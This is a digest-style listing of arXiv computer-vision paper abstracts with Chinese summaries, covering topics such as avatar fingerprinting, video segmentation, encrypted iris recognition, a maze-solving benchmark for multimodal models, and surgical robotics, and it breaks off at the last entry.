链接: https://arxiv.org/abs/2603.26934
作者: Laura Pedrouzo-Rodriguez,Luis F. Gomez,Ruben Tolosana,Ruben Vera-Rodriguez,Roberto Daza,Aythami Morales,Julian Fierrez
机构: BiometricsAI; Universidad Autónoma de Madrid (马德里自治大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advances in photorealistic avatar generation have enabled highly realistic talking-head avatars, raising security concerns regarding identity impersonation in AI-mediated communication. To advance in this challenging problem, the task of avatar fingerprinting aims to determine whether two avatar videos are driven by the same human operator or not. However, current public databases in the literature are scarce and based solely on old-fashioned talking-head avatar generators, not representing realistic scenarios for the current task of avatar fingerprinting. To overcome this situation, the present article introduces AVAPrintDB, a new publicly available multi-generator talking-head avatar database for avatar fingerprinting. AVAPrintDB is constructed from two audiovisual corpora and three state-of-the-art avatar generators (GAGAvatar, LivePortrait, HunyuanPortrait), representing different synthesis paradigms, and includes both self- and cross-reenactments to simulate legitimate usage and impersonation scenarios. Building on this database, we also define a standardized and reproducible benchmark for avatar fingerprinting, considering public state-of-the-art avatar fingerprinting systems and exploring novel methods based on Foundation Models (DINOv2 and CLIP). Also, we conduct a comprehensive analysis under generator and dataset shift. Our results show that, while identity-related motion cues persist across synthetic avatars, current avatar fingerprinting systems remain highly sensitive to changes in the synthesis pipeline and source domain. The AVAPrintDB, benchmark protocols, and avatar fingerprinting systems are publicly available to facilitate reproducible research. Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.26934 [cs.CV] (or arXiv:2603.26934v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.26934 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-244] Live Interactive Training for Video Segmentation CVPR2026
【速读】:该论文旨在解决交互式视频分割(Interactive Video Segmentation)中用户干预效率低下的问题,即当前先进模型(如SAM2)仅对用户修正进行即时修复,而无法从中学习,导致在复杂场景(如遮挡、物体分离、伪装等)下需要重复大量人工修正。其解决方案的关键在于提出一种名为“实时交互训练”(Live Interactive Training, LIT)的新框架,该框架允许视觉系统在推理过程中在线学习用户的修正反馈;具体实现上,通过LIT-LoRA模块动态更新轻量级LoRA(Low-Rank Adaptation)参数,在每次用户修正后以约0.5秒的极低开销快速微调模型,从而显著提升后续帧的分割性能。实验表明,该方法在挑战性基准上平均减少18–34%的总修正次数,验证了实时适应机制在降低冗余人力投入方面的有效性。
链接: https://arxiv.org/abs/2603.26929
作者: Xinyu Yang,Haozheng Yu,Yihong Sun,Bharath Hariharan,Jennifer J. Sun
机构: Cornell University (康奈尔大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Interactive video segmentation often requires many user interventions for robust performance in challenging scenarios (e.g., occlusions, object separations, camouflage, etc.). Yet, even state-of-the-art models like SAM2 use corrections only for immediate fixes without learning from this feedback, leading to inefficient, repetitive user effort. To address this, we introduce Live Interactive Training (LIT), a novel framework for prompt-based visual systems where models also learn online from human corrections at inference time. Our primary instantiation, LIT-LoRA, implements this by continually updating a lightweight LoRA module on-the-fly. When a user provides a correction, this module is rapidly trained on that feedback, allowing the vision system to improve performance on subsequent frames of the same video. Leveraging the core principles of LIT, our LIT-LoRA implementation achieves an average 18-34% reduction in total corrections on challenging video segmentation benchmarks, with a negligible training overhead of ~0.5s per correction. We further demonstrate its generality by successfully adapting it to other segmentation models and extending it to CLIP-based fine-grained image classification. Our work highlights the promise of live adaptation to transform interactive tools and significantly reduce redundant human effort in complex visual tasks. Project: this https URL.
[CV-245] FusionAgent : A Multimodal Agent with Dynamic Model Selection for Human Recognition CVPR2026
【速读】:该论文旨在解决现有全身体征识别系统中模型融合策略静态化导致的效率低下与鲁棒性不足问题,即无论测试样本质量或模态可靠性如何,均调用全部模型进行推理,造成资源浪费且难以适应复杂场景。解决方案的关键在于提出FusionAgent框架,其核心创新包括:1)利用多模态大语言模型(Multimodal Large Language Model, MLLM)作为智能代理(agent),通过基于指标奖励的强化微调(Reinforcement Fine-Tuning, RFT)实现针对每个测试样本的动态、自适应模型选择;2)设计Anchor-based Confidence Top-k (ACT)评分融合机制,以最置信模型为锚点,以置信度感知方式整合互补预测,有效缓解模型得分偏移与嵌入异构性问题。实验表明,该方法在多个全身体征基准上显著优于当前最优方法,同时减少模型调用次数,提升了识别系统的效率、可解释性与鲁棒性。
链接: https://arxiv.org/abs/2603.26908
作者: Jie Zhu,Xiao Guo,Yiyang Su,Anil Jain,Xiaoming Liu
机构: Michigan State University (密歇根州立大学); University of North Carolina at Chapel Hill (北卡罗来纳大学教堂山分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Model fusion is a key strategy for robust recognition in unconstrained scenarios, as different models provide complementary strengths. This is especially important for whole-body human recognition, where biometric cues such as face, gait, and body shape vary across samples and are typically integrated via score-fusion. However, existing score-fusion strategies are usually static, invoking all models for every test sample regardless of sample quality or modality reliability. To overcome these limitations, we propose \textbfFusionAgent, a novel agentic framework that leverages a Multimodal Large Language Model (MLLM) to perform dynamic, sample-specific model selection. Each expert model is treated as a tool, and through Reinforcement Fine-Tuning (RFT) with a metric-based reward, the agent learns to adaptively determine the optimal model combination for each test input. To address the model score misalignment and embedding heterogeneity, we introduce Anchor-based Confidence Top-k (ACT) score-fusion, which anchors on the most confident model and integrates complementary predictions in a confidence-aware manner. Extensive experiments on multiple whole-body biometric benchmarks demonstrate that FusionAgent significantly outperforms SoTA methods while achieving higher efficiency through fewer model invocations, underscoring the critical role of dynamic, explainable, and robust model fusion in real-world recognition systems. Project page: \hrefthis https URLFusionAgent.
[CV-246] Computer Vision with a Superpixelation Camera
【速读】:该论文旨在解决传统相机在资源受限场景下数据冗余问题,即相机生成的数据流通常与图像像素数量相当,但其中大部分信息对下游计算机视觉算法而言是冗余的,导致处理效率低下。解决方案的关键在于提出一种名为SuperCam的新式相机设计,其核心是在采集过程中实时执行超像素分割(superpixel segmentation),从而自适应地压缩和优化数据流。实验表明,在内存受限条件下,SuperCam相较于现有最优超像素算法具有更优性能,并且在图像分割、目标检测和单目深度估计等任务中表现出优越的输出质量,为边缘设备部署计算机视觉模型提供了高效的数据处理路径。
链接: https://arxiv.org/abs/2603.26900
作者: Sasidharan Mahalingam,Rachel Brown,Atul Ingle
机构: Portland State University (波特兰州立大学); Willamette University (威拉米特大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Conventional cameras generate a lot of data that can be challenging to process in resource-constrained applications. Usually, cameras generate data streams on the order of the number of pixels in the image. However, most of this captured data is redundant for many downstream computer vision algorithms. We propose a novel camera design, which we call SuperCam, that adaptively processes captured data by performing superpixel segmentation on the fly. We show that SuperCam performs better than current state-of-the-art superpixel algorithms under memory-constrained situations. We also compare how well SuperCam performs when the compressed data is used for downstream computer vision tasks. Our results demonstrate that the proposed design provides superior output for image segmentation, object detection, and monocular depth estimation in situations where the available memory on the camera is limited. We posit that superpixel segmentation will play a crucial role as more computer vision inference models are deployed in edge devices. SuperCam would allow computer vision engineers to design more efficient systems for these applications.
[CV-247] Privacy-Preserving Iris Recognition: Performance Challenges and Outlook
【速读】:该论文旨在解决隐私保护型虹膜识别系统在使用全同态加密(Fully Homomorphic Encryption, FHE)时面临的性能瓶颈问题,尤其是在去中心化和不可信环境下的实际部署障碍。其解决方案的关键在于提出一个符合ISO/IEC 24745标准的可扩展隐私保护框架:首先利用Open Iris库实现鲁棒的虹膜分割、归一化与Gabor滤波特征提取生成虹膜码,随后通过二进制掩码剔除不可靠区域,并在加密状态下基于汉明距离(Hamming distance)进行匹配。实验表明,该方案在CASIA-Iris-Thousand数据集上实现了与明文等效的识别精度,但单次模板比对的计算开销高达约12万倍,凸显了在大规模1-N匹配场景中采用两级架构(two-level schemes)以提升效率的必要性。
链接: https://arxiv.org/abs/2603.26890
作者: Christina Karakosta,Lian Alhedaithy,William J. Knottenbelt
机构: 未知
类目: Cryptography and Security (cs.CR); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Iris-based biometric identification is increasingly recognized for its significant accuracy and long-term stability compared to other biometric modalities such as fingerprints or facial features. However, all biometric modalities are highly sensitive data that raise serious privacy and security concerns, particularly in decentralized and untrusted environments. While Fully Homomorphic Encryption (FHE) has emerged as a promising solution for protecting sensitive data during computation, existing privacy-preserving iris recognition systems face significant performance limitations that hinder their practical deployment. This paper investigates the performance challenges of the current landscape of privacy-preserving iris recognition systems using FHE. Based on these insights, we outline a scalable privacy-preserving framework that aligns with all the requirements specified in the ISO/IEC 24745 standard. Leveraging the Open Iris library, our approach starts with robust iris segmentation, followed by normalization and feature extraction using Gabor filters to generate iris codes. We then apply binary masking to filter out unreliable regions and perform matching using Hamming distance on encrypted iris codes. The accuracy and performance of our proposed privacy-preserving framework is evaluated on the CASIA-Iris-Thousand dataset. Results show that our privacy-preserving framework yields very similar accuracy to the cleartext equivalent, but a much higher computational overhead with respect to pairwise iris template comparisons, of \sim 120,000 \times . This points towards the need for the deployment of two-level schemes in the context of scalable 1-N template comparisons.
[CV-248] E-CAM: Built-in Class Activation Maps for Test-Time Explainability in Pretrained Black-Box CNNs
【速读】:该论文旨在解决卷积神经网络(Convolutional Neural Networks, CNNs)在医学图像分析中虽性能优异但缺乏可解释性的问题,这限制了其在高风险临床场景中的应用。现有方法存在根本性权衡:事后解释方法(post-hoc methods)提供的是不忠实的近似解释,而内在可解释架构虽能保证解释的真实性(faithfulness),却常以牺牲预测性能为代价。论文提出的解决方案是TTE-CAM(Test-Time Explainable CAM),其关键在于在测试阶段通过基于卷积的操作替换预训练CNN的分类头,并利用原始权重初始化该模块,从而将黑盒模型转化为自解释模型。该方法在不损失原有预测性能的前提下,实现了与事后解释方法相当甚至更优的忠实解释能力。
链接: https://arxiv.org/abs/2603.26885
作者: Kerol Djoumessi,Philipp Berens
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Unlocking Test-Time Explainability from Pretrained Black-Box CNNs
Abstract:Convolutional neural networks (CNNs) achieve state-of-the-art performance in medical image analysis yet remain opaque, limiting adoption in high-stakes clinical settings. Existing approaches face a fundamental trade-off: post-hoc methods provide unfaithful approximate explanations, while inherently interpretable architectures are faithful but often sacrifice predictive performance. We introduce TTE-CAM, a test-time framework that bridges this gap by converting pretrained black-box CNNs into self-explainable models via a convolution-based replacement of their classification head, initialized from the original weights. The resulting model preserves black-box predictive performance while delivering built-in faithful explanations competitive with post-hoc methods, both qualitatively and quantitatively. The code is available at this https URL
[CV-249] LACON: Training Text-to-Image Model from Uncurated Data
【速读】:该论文旨在解决当前文本到图像生成模型训练中过度依赖高质量过滤数据的问题,即现有方法采用“先筛选后训练”的范式,将低质量原始数据直接丢弃,假设其对模型性能有害。然而,作者质疑这种做法是否真正合理,并提出LACON(Labeling-and-Conditioning)框架作为解决方案。其关键在于不抛弃未筛选的数据,而是将其转化为可学习的条件信号(如美学评分和水印概率),并显式地建模从低质量到高质量数据的连续分布,使生成模型能够学习质量边界并提升整体生成效果,在相同计算预算下优于仅使用过滤数据训练的基线模型,从而证明了未筛选数据的潜在价值。
链接: https://arxiv.org/abs/2603.26866
作者: Zhiyang Liang,Ziyu Wan,Hongyu Liu,Dong Chen,Qiu Shen,Hao Zhu,Dongdong Chen
机构: Nanjing University (南京大学); Microsoft Research (微软研究院); HKUST (香港科技大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The success of modern text-to-image generation is largely attributed to massive, high-quality datasets. Currently, these datasets are curated through a filter-first paradigm that aggressively discards low-quality raw data based on the assumption that it is detrimental to model performance. Is the discarded bad data truly useless, or does it hold untapped potential? In this work, we critically re-examine this question. We propose LACON (Labeling-and-Conditioning), a novel training framework that exploits the underlying uncurated data distribution. Instead of filtering, LACON re-purposes quality signals, such as aesthetic scores and watermark probabilities as explicit, quantitative condition labels. The generative model is then trained to learn the full spectrum of data quality, from bad to good. By learning the explicit boundary between high- and low-quality content, LACON achieves superior generation quality compared to baselines trained only on filtered data using the same compute budget, proving the significant value of uncurated data.
[CV-250] Beyond Textual Knowledge-Leverag ing Multimodal Knowledge Bases for Enhancing Vision-and-Language Navigation
【速读】:该论文旨在解决视觉-语言导航(Vision-and-Language Navigation, VLN)中语义线索捕捉不足与视觉观测对齐不准确的问题。解决方案的关键在于提出一种名为Beyond Textual Knowledge (BTK) 的新框架,该框架通过融合环境特定的文本知识与生成式图像知识库,实现更精准的语义定位和跨模态对齐:具体而言,利用Qwen3-4B提取目标相关短语,借助Flux-Schnell构建两个大规模图像知识库(R2R-GP 和 REVERIE-GP),并基于BLIP-2从全景视图中构建环境特异性文本知识库;这些多模态知识库通过Goal-Aware Augmentor和Knowledge Augmentor模块进行有效整合,显著提升了导航性能。
链接: https://arxiv.org/abs/2603.26859
作者: Dongsheng Yang,Yinfeng Yu,Liejun Wang
机构: Xinjiang University (新疆大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Image and Video Processing (eess.IV)
备注: Main paper (37 pages). Accepted for publication by the Information Processing and Management,Volume 63,Issue 6,September 2026,104766
Abstract:Vision-and-Language Navigation (VLN) requires an agent to navigate through complex unseen environments based on natural language instructions. However, existing methods often struggle to effectively capture key semantic cues and accurately align them with visual observations. To address this limitation, we propose Beyond Textual Knowledge (BTK), a VLN framework that synergistically integrates environment-specific textual knowledge with generative image knowledge bases. BTK employs Qwen3-4B to extract goal-related phrases and utilizes Flux-Schnell to construct two large-scale image knowledge bases: R2R-GP and REVERIE-GP. Additionally, we leverage BLIP-2 to construct a large-scale textual knowledge base derived from panoramic views, providing environment-specific semantic cues. These multimodal knowledge bases are effectively integrated via the Goal-Aware Augmentor and Knowledge Augmentor, significantly enhancing semantic grounding and cross-modal alignment. Extensive experiments on the R2R dataset with 7,189 trajectories and the REVERIE dataset with 21,702 instructions demonstrate that BTK significantly outperforms existing baselines. On the test unseen splits of R2R and REVERIE, SR increased by 5% and 2.07% respectively, and SPL increased by 4% and 3.69% respectively. The source code is available at this https URL.
[CV-251] Dual-View Optical Flow for 4D Micro-Expression Recognition - A Multi-Stream Fusion Attention Approach
【速读】:该论文旨在解决4D微表情识别(4D micro-expression recognition)中的两大挑战:一是微表情持续时间极短、强度低,难以捕捉;二是4D网格数据维度高、处理复杂。其解决方案的关键在于提出一种双视角光流(dual-view optical flow)方法,通过同步采集两个视角的微表情序列并计算光流来表征面部运动,从而简化高维网格数据的处理流程。进一步地,该方法将每个序列分解为起始-峰值和峰值-结束两个阶段,提取水平、垂直及幅值光流通道,并输入到Triple-Stream MicroAttNet网络中,该网络结合融合注意力模块(fusion attention module)与挤压激励块(squeeze-and-excitation block),实现多模态特征自适应加权和幅度信息增强,显著提升了识别性能,在4DMR IJCAI Workshop Challenge 2025中以宏平均UF1得分0.536排名第一。
链接: https://arxiv.org/abs/2603.26849
作者: Luu Tu Nguyen,Thi Bich Phuong Man,Vu Tram Anh Khuong,Thanh Ha Le,Thi Duyen Ngo
机构: VNU University of Engineering and Technology, Faculty of Information Technology, Hanoi, Vietnam
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Micro-expression recognition is vital for affective computing but remains challenging due to the extremely brief, low-intensity facial motions involved and the high-dimensional nature of 4D mesh data. To address these challenges, we introduce a dual-view optical flow approach that simplifies mesh processing by capturing each micro-expression sequence from two synchronized viewpoints and computing optical flow to represent motion. Our pipeline begins with view separation and sequence-wise face cropping to ensure spatial consistency, followed by automatic apex-frame detection based on peak motion intensity in both views. We decompose each sequence into onset-apex and apex-offset phases, extracting horizontal, vertical, and magnitude flow channels for each phase. These are fed into our Triple-Stream MicroAttNet, which employs a fusion attention module to adaptively weight modality-specific features and a squeeze-and-excitation block to enhance magnitude representations. Training uses focal loss to mitigate class imbalance and the Adam optimizer with early stopping. Evaluated on the multi-label 4DME dataset, comprising 24 subjects and five emotion categories, in the 4DMR IJCAI Workshop Challenge 2025, our method achieves a macro-UF1 score of 0.536, outperforming the official baseline by over 50% and securing first place. Ablation studies confirm that both the fusion attention and SE components each contribute up to 3.6 points of UF1 gain. These results demonstrate that dual-view, phase-aware optical flow combined with multi-stream fusion yields a robust and interpretable solution for 4D micro-expression recognition.
[CV-252] VAN-AD: Visual Masked Autoencoder with Normalizing Flow For Time Series Anomaly Detection
【速读】:该论文旨在解决时间序列异常检测(Time Series Anomaly Detection, TSAD)中现有方法因需为每个数据集单独训练模型而导致的泛化能力不足问题,尤其在训练数据稀缺场景下性能受限。解决方案的关键在于提出一种基于视觉掩码自编码器(Masked Autoencoder, MAE)的新型框架VAN-AD,其核心创新包括:一是设计自适应分布映射模块(Adaptive Distribution Mapping Module, ADMM),将MAE重建结果映射至统一统计空间以增强异常模式引起的差异;二是引入归一化流模块(Normalizing Flow Module, NFM),结合MAE与归一化流技术,估计当前窗口在全局分布下的概率密度,从而提升对局部细节的感知能力。实验表明,VAN-AD在九个真实世界数据集上均显著优于现有最先进方法。
链接: https://arxiv.org/abs/2603.26842
作者: PengYu Chen,Shang Wan,Xiaohou Shi,Yuan Chang,Yan Sun,Sajal K. Das
机构: Beijing University of Posts and Telecommunications (北京邮电大学); China Telecom Research Institute (中国电信研究院); Missouri University of Science and Technology (密苏里科技大学)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 13 pages, 20 figures
Abstract:Time series anomaly detection (TSAD) is essential for maintaining the reliability and security of IoT-enabled service systems. Existing methods require training one specific model for each dataset, which exhibits limited generalization capability across different target datasets, hindering anomaly detection performance in various scenarios with scarce training data. To address this limitation, foundation models have emerged as a promising direction. However, existing approaches either repurpose large language models (LLMs) or construct largescale time series datasets to develop general anomaly detection foundation models, and still face challenges caused by severe cross-modal gaps or in-domain heterogeneity. In this paper, we investigate the applicability of large-scale vision models to TSAD. Specifically, we adapt a visual Masked Autoencoder (MAE) pretrained on ImageNet to the TSAD task. However, directly transferring MAE to TSAD introduces two key challenges: overgeneralization and limited local perception. To address these challenges, we propose VAN-AD, a novel MAE-based framework for TSAD. To alleviate the over-generalization issue, we design an Adaptive Distribution Mapping Module (ADMM), which maps the reconstruction results before and after MAE into a unified statistical space to amplify discrepancies caused by abnormal patterns. To overcome the limitation of local perception, we further develop a Normalizing Flow Module (NFM), which combines MAE with normalizing flow to estimate the probability density of the current window under the global distribution. Extensive experiments on nine real-world datasets demonstrate that VAN-AD consistently outperforms existing state-of-the-art methods across multiple evaluation this http URL make our code and datasets available at this https URL.
[CV-253] From Pixels to BFS: High Maze Accuracy Does Not Imply Visual Planning
【速读】:该论文旨在解决多模态模型在视觉空间任务中是否具备真正的规划能力,还是仅通过在标记(token)空间中的暴力搜索来完成任务的问题。其关键解决方案是构建了一个名为MazeBench的基准测试,包含110张程序生成的迷宫图像,并系统评估了来自OpenAI、Anthropic、Google和Alibaba的16种模型配置。实验发现,尽管GPT-5.4和Gemini 3.1 Pro等模型在准确率上表现优异(分别为91%和79%),但它们实际上依赖于将图像转化为文本网格后进行逐步路径枚举,消耗大量token(1,710–22,818个/次),远超人类处理效率;且当不提供额外推理预算时,性能骤降至2–12%,在超难迷宫中因token限制而失败。进一步的消融实验证明,模型的瓶颈在于弱化的视觉提取能力而非下游搜索策略——当直接提供正确网格时,Claude Sonnet 4.6准确率从6%跃升至80%。即使明确禁止构造网格或执行图搜索,模型仍会回归到相同的枚举策略,表明当前多模态模型缺乏真正的人类级空间理解能力。
链接: https://arxiv.org/abs/2603.26839
作者: Alberto G. Rodriguez Salgado
机构: OpenAI; Anthropic; Google; Alibaba
类目: Machine Learning (cs.LG); Computer Vision and Pattern Recognition (cs.CV)
备注: 15 pages, 10 figures. Code and mazes available at this https URL
Abstract:How do multimodal models solve visual spatial tasks – through genuine planning, or through brute-force search in token space? We introduce \textscMazeBench, a benchmark of 110 procedurally generated maze images across nine controlled groups, and evaluate 16 model configurations from OpenAI, Anthropic, Google, and Alibaba. GPT-5.4 solves 91% and Gemini 3.1 Pro 79%, but these scores are misleading: models typically translate images into text grids and then enumerate paths step by step, consuming 1,710–22,818 tokens per solve for a task humans do quickly. Without added reasoning budgets, all configurations score only 2–12%; on 20 \times 20 ultra-hard mazes, they hit token limits and fail. Qualitative traces reveal a common two-stage strategy: image-to-grid translation followed by token-level search, effectively BFS in prose. A text-grid ablation shows Claude Sonnet 4.6 rising from 6% on images to 80% when given the correct grid, isolating weak visual extraction from downstream search. When explicitly instructed not to construct a grid or perform graph search, models still revert to the same enumeration strategy. \textscMazeBench therefore shows that high accuracy on visual planning tasks does not imply human-like spatial understanding.
[CV-254] SpatialAnt: Autonomous Zero-Shot Robot Navigation via Active Scene Reconstruction and Visual Anticipation
【速读】:该论文旨在解决当前零样本视觉-语言导航(Vision-and-Language Navigation, VLN)方法在真实机器人部署中面临的挑战:即依赖高质量人工构建的场景重建,而实际环境中机器人需通过自主预探索建立自身先验,但自建重建存在不完整与噪声问题,严重削弱了对高质场景重建依赖的方法性能。解决方案的关键在于提出SpatialAnt框架,其核心创新包括两个方面:一是引入物理定位策略以恢复单目重建的绝对度量尺度;二是设计一种新颖的视觉预期机制,利用噪声点云渲染未来观测,使智能体能够进行反事实推理并剔除与人类指令矛盾的路径,从而在不依赖高质量重建的前提下实现鲁棒导航。
链接: https://arxiv.org/abs/2603.26837
作者: Jiwen Zhang,Xiangyu Shi,Siyuan Wang,Zerui Li,Zhongyu Wei,Qi Wu
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 10 pages, 4 figures, 5 tables. Homepage: this https URL
Abstract:Vision-and-Language Navigation (VLN) has recently benefited from Multimodal Large Language Models (MLLMs), enabling zero-shot navigation. While recent exploration-based zero-shot methods have shown promising results by leveraging global scene priors, they rely on high-quality human-crafted scene reconstructions, which are impractical for real-world robot deployment. When encountering an unseen environment, a robot should build its own priors through pre-exploration. However, these self-built reconstructions are inevitably incomplete and noisy, which severely degrade methods that depend on high-quality scene reconstructions. To address these issues, we propose SpatialAnt, a zero-shot navigation framework designed to bridge the gap between imperfect self-reconstructions and robust execution. SpatialAnt introduces a physical grounding strategy to recover the absolute metric scale for monocular-based reconstructions. Furthermore, rather than treating the noisy self-reconstructed scenes as absolute spatial references, we propose a novel visual anticipation mechanism. This mechanism leverages the noisy point clouds to render future observations, enabling the agent to perform counterfactual reasoning and prune paths that contradict human instructions. Extensive experiments in both simulated and real-world environments demonstrate that SpatialAnt significantly outperforms existing zero-shot methods. We achieve a 66% Success Rate (SR) on R2R-CE and 50.8% SR on RxR-CE benchmarks. Physical deployment on a Hello Robot further confirms the efficiency and efficacy of our framework, achieving a 52% SR in challenging real-world settings.
[CV-255] Envisioning global urban development with satellite imagery and generative AI
【速读】:该论文旨在解决传统城市发展规划研究中将城市演化视为预测任务、忽视其生成本质的问题。为应对这一挑战,作者提出了一种多模态生成式 AI(Generative AI)框架,其核心创新在于通过融合文本提示(prompts)与地理空间控制(geospatial controls),实现对全球前500大城市区域高保真、多样化且真实的卫星影像生成。该方案不仅支持用户设定发展目标以生成符合意图的城市场景,还借助环境学习机制促进城市更新实践,并通过隐变量表征(latent representations)实现跨城市空间网络的风格迁移与下游任务增强(如碳排放预测)。
链接: https://arxiv.org/abs/2603.26831
作者: Kailai Sun,Yuebing Liang,Mingyi He,Yunhan Zheng,Alok Prakash,Shenhao Wang,Jinhua Zhao,Alex "Sandy’’ Pentland
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Urban development has been a defining force in human history, shaping cities for centuries. However, past studies mostly analyze such development as predictive tasks, failing to reflect its generative nature. Therefore, this study designs a multimodal generative AI framework to envision sustainable urban development at a global scale. By integrating prompts and geospatial controls, our framework can generate high-fidelity, diverse, and realistic urban satellite imagery across the 500 largest metropolitan areas worldwide. It enables users to specify urban development goals, creating new images that align with them while offering diverse scenarios whose appearance can be controlled with text prompts and geospatial constraints. It also facilitates urban redevelopment practices by learning from the surrounding environment. Beyond visual synthesis, we find that it encodes and interprets latent representations of urban form for global cross-city learning, successfully transferring styles of urban environments across a global spatial network. The latent representations can also enhance downstream prediction tasks such as carbon emission prediction. Further, human expert evaluation confirms that our generated urban images are comparable to real urban images. Overall, this study presents innovative approaches for accelerated urban planning and supports scenario-based planning processes for worldwide cities.
[CV-256] Central-to-Local Adaptive Generative Diffusion Framework for Improving Gene Expression Prediction in Data-Limited Spatial Transcriptomics
【速读】:该论文旨在解决空间转录组学(Spatial Transcriptomics, ST)数据稀缺问题,即由于高成本、低通量和有限的数据共享导致的训练样本不足,从而制约了计算模型的鲁棒性发展。其解决方案的关键在于提出一种中心到局部自适应生成扩散框架(Central-to-Local adaptive generative diffusion framework for ST, C2L-ST):首先在大规模病理图像数据集上预训练一个全局中心模型以学习可迁移的形态学表征,随后通过轻量级基因条件调制机制,在少量配对图像-基因点的基础上,对机构特异的局部模型进行微调。这一策略实现了在数据受限条件下合成真实且分子一致的组织切片片段,显著提升了下游任务中基因表达预测的准确性与空间一致性,同时仅需极少量采样点即可达到接近真实数据的性能表现。
链接: https://arxiv.org/abs/2603.26827
作者: Yaoyu Fang,Jiahe Qian,Xinkun Wang,Lee A. Cooper,Bo Zhou
机构: Northwestern University (西北大学)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 31 pages, 12 figures, under review
Abstract:Spatial Transcriptomics (ST) provides spatially resolved gene expression profiles within intact tissue architecture, enabling molecular analysis in histological context. However, the high cost, limited throughput, and restricted data sharing of ST experiments result in severe data scarcity, constraining the development of robust computational models. To address this limitation, we present a Central-to-Local adaptive generative diffusion framework for ST (C2L-ST) that integrates large-scale morphological priors with limited molecular guidance. A global central model is first pretrained on extensive histopathology datasets to learn transferable morphological representations, and institution-specific local models are then adapted through lightweight gene-conditioned modulation using a small number of paired image-gene spots. This strategy enables the synthesis of realistic and molecularly consistent histology patches under data-limited conditions. The generated images exhibit high visual and structural fidelity, reproduce cellular composition, and show strong embedding overlap with real data across multiple organs, reflecting both realism and diversity. When incorporated into downstream training, synthetic image-gene pairs improve gene expression prediction accuracy and spatial coherence, achieving performance comparable to real data while requiring only a fraction of sampled spots. C2L-ST provides a scalable and data-efficient framework for molecular-level data augmentation, offering a domain-adaptive and generalizable approach for integrating histology and transcriptomics in spatial biology and related fields.
[CV-257] arg-VU: Affordance Reasoning with Physics-Aware 3D Geometry for Visual Understanding in Robotic Surgery
【速读】:该论文旨在解决手术机器人中因组织高度可变形、柔性和与器械运动动态耦合而导致的感知与动作之间关联不明确的问题,即缺乏一种能够有效融合物理约束与视觉理解的 affordance reasoning(可及性推理)方法。其解决方案的关键在于提出 arg-VU 框架,该框架通过结合时序一致的几何追踪(基于 3D Gaussian Splatting 重建)与约束诱导的机械建模(利用 Extended Position-Based Dynamics, XPBD),生成具有局部形变约束敏感性的代表性几何点(Representative Geometry Points, RGPs),从而构建出能反映局部约束流形几何特性的各向异性刚度度量;进一步将机器人工具在 SE(3) 空间中的位姿引入,计算 RGPs 上由刚体运动引起的位移,并据此推导出两个互补指标:一个物理感知的合规能量(physics-aware compliance energy),用于评估局部形变约束下的机械可行性;另一个位置一致性得分(positional agreement score),用于衡量运动对齐程度(作为运动学基线)。此方法实现了对柔性手术环境更稳定、物理一致且可解释的 affordance 推理,支持具身机器人交互。
链接: https://arxiv.org/abs/2603.26814
作者: Nan Xiao,Yunxin Fan,Farong Wang,Fei Liu
机构: University of Tennessee, Knoxville, TN, USA; Stanford University, Palo Alto, CA, USA
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Affordance reasoning provides a principled link between perception and action, yet remains underexplored in surgical robotics, where tissues are highly deformable, compliant, and dynamically coupled with tool motion. We present arg-VU, a physics-aware affordance reasoning framework that integrates temporally consistent geometry tracking with constraint-induced mechanical modeling for surgical visual understanding. Surgical scenes are reconstructed using 3D Gaussian Splatting (3DGS) and converted into a temporally tracked surface representation. Extended Position-Based Dynamics (XPBD) embeds local deformation constraints and produces representative geometry points (RGPs) whose constraint sensitivities define anisotropic stiffness metrics capturing the local constraint-manifold geometry. Robotic tool poses in SE(3) are incorporated to compute rigidly induced displacements at RGPs, from which we derive two complementary measures: a physics-aware compliance energy that evaluates mechanical feasibility with respect to local deformation constraints, and a positional agreement score that captures motion alignment (as kinematic motion baseline). Experiments on surgical video datasets show that arg-VU yields more stable, physically consistent, and interpretable affordance predictions than kinematic baselines. These results demonstrate that physics-aware geometric representations enable reliable affordance reasoning for deformable surgical environments and support embodied robotic interaction.
[CV-258] Implicit neural representations for larval zebrafish brain microscopy: a reproducible benchmark on the MapZebrain atlas
【速读】:该论文旨在解决高分辨率幼年斑马鱼显微图像中隐式神经表示(Implicit Neural Representations, INRs)的可复现评估问题,特别是在保留神经突边界和细小神经元结构方面缺乏统一基准的现状。其解决方案的关键在于构建了一个针对MapZebrain幼年斑马鱼脑图谱的可复现INR基准测试框架,采用统一且种子可控的协议,在950张灰度显微图像上系统比较了SIREN、傅里叶特征(Fourier features)、哈尔位置编码(Haar positional encoding)及多分辨率网格(multi-resolution grid)四种INR方法。通过基于像素百分位数的归一化策略与确定性的40%列级留出验证,结果表明:哈尔和傅里叶编码在宏平均重建保真度(约26 dB)和边缘保持能力上表现最优,优于平滑偏置型的SIREN;而SIREN在区域加权微平均指标下仍具竞争力,适用于背景建模或去噪任务。这揭示了显式频域与多尺度编码更擅长捕捉神经解剖细节,为MapZebrain工作流中的图谱配准、标签传递及形态保持共享提供了最优INR选择依据。
链接: https://arxiv.org/abs/2603.26811
作者: Agnieszka Pregowska
机构: 未知
